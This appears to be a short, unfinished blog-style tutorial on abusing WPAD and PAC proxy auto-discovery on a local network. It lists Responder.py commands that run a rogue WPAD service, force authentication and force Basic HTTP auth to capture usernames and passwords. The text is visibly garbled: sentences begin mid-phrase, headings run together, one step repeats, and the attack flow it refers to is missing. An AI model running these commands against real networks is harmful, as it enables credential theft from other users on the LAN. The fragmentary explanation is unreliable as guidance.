PAC itself works with a protocol called Web Proxy Auto-Discovery (WPAD) WPAD removes the need for the browser or the user to have a pre-configured server to connect to. Instead, WPAD allows the computer to query the local network to discover the server to load the PAC file from.
FindProxyForURL()function in the PAC script and use the proxy settings returned from this function.
WPAD is practically asking the network "Hey there! would you like to send me a payload i can execute?"
You can clearly see how a bad actor can abuse this.
When a device has these protocols enabled, if the local network DNS cannot resolve the name, the machine will ask the whole network to get a host. So, any host of the network, who knows its IP, can reply. Even if a host replies with incorrect information, it will still be regarded as a legitimate response.
automatically detect settingsin
Local Area Network (LAN) Settings.
According to the flow above, if an attacker wants to make sure that the attack will be successful, he must perform the following attacks:
-A option enables analyze only mode
1./Responder.py -i <your ip address> -A
1./Responder.py -I <your net interface> -A
-w: starts WPAD service
-f: fingerprints victims
-v: verbose output
-F: force auth to WPAD service
1 ./Responder.py -i 192.168.1.215 -w -f -v -F
force basic auth to try and gain user & pass
-b: force Basic HTTP authentication
1 ./Responder.py -i 192.168.1.215 -w -f -v -b -F
[WIP]This article is a work in progress and will be updated with a proof of concept soon.